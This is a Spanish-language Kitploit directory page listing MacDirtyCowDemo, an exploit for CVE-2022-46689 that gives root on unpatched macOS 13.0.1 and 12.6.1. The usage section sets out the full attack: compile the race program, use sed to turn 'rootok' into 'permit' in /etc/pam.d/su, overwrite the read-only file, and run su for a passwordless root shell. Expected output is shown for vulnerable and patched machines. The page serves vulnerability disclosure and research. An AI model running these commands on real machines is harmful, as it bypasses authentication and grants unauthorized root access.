Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
MacDirtyCowDemo — Obtén root en macOS 13.0.1 con CVE-2022-46689 (el equivalente en macOS de la vulnerabilidad Dirty Cow), usando el caso de prueba extraído del código fuente de XNU de Apple. | Kitploit
Herramientas/GitHubGitHub/zhuowei/macdirtycowdemo
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónRed TeamingExplotación de Binarios
GitHubzhuowei/macdirtycowdemo

MacDirtyCowDemo

Obtén root en macOS 13.0.1 con CVE-2022-46689 (el equivalente en macOS de la vulnerabilidad Dirty Cow), usando el caso de prueba extraído del código fuente de XNU de Apple.

Ver Repositorio
410351hace 3 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Sitio web

Obtén root en macOS 13.0.1 con CVE-2022-46689 (el equivalente en macOS del bug Dirty Cow), usando el caso de prueba extraído del código fuente de XNU de Apple.

https://worthdoingbadly.com/macdirtycow/

Uso

En una máquina con macOS 13.0.1 / 12.6.1 (o inferior), ejecuta:

root@kitploit:~
clang -o switcharoo vm_unaligned_copy_switch_race.c
sed -e "s/rootok/permit/g" /etc/pam.d/su > overwrite_file.bin
./switcharoo /etc/pam.d/su overwrite_file.bin
su

Deberías obtener:

root@kitploit:~
% ./switcharoo /etc/pam.d/su overwrite_file.bin
Testing for 10 seconds...
RO mapping was modified
% su
sh-3.2# 

Probado en macOS 13 beta (22A5266r) con SIP desactivado (debería funcionar igualmente con SIP activado).

Si tu sistema está completamente parcheado (macOS 13.1 / 12.6.2), en su lugar debería mostrar:

root@kitploit:~
$ ./switcharoo /etc/pam.d/su overwrite_file.bin
Testing for 10 seconds...
vm_read_overwrite: KERN_SUCCESS:9865 KERN_PROTECTION_FAILURE:3840 other:0
Ran 13705 times in 10 seconds with no failure

y ejecutar su debería seguir pidiendo una contraseña.

Gracias al volumen de sistema sellado, ejecutar esto sobre cualquier archivo del volumen /System solo modifica el archivo temporalmente: se revierte al reiniciar. Ejecutarlo sobre un archivo en un volumen con permisos de escritura conservará la modificación después de un reinicio.

Créditos

  • Ian Beer de Project Zero por encontrar el fallo. ¡Espero con interés tu informe!
  • Apple por el caso de prueba. (No cambié nada: solo añadí el parámetro de línea de comandos para controlar qué sobrescribir.)
  • SSLab@Gatech por el truco para deshabilitar la comprobación de contraseña usando /etc/pam.d.
Descargar herramienta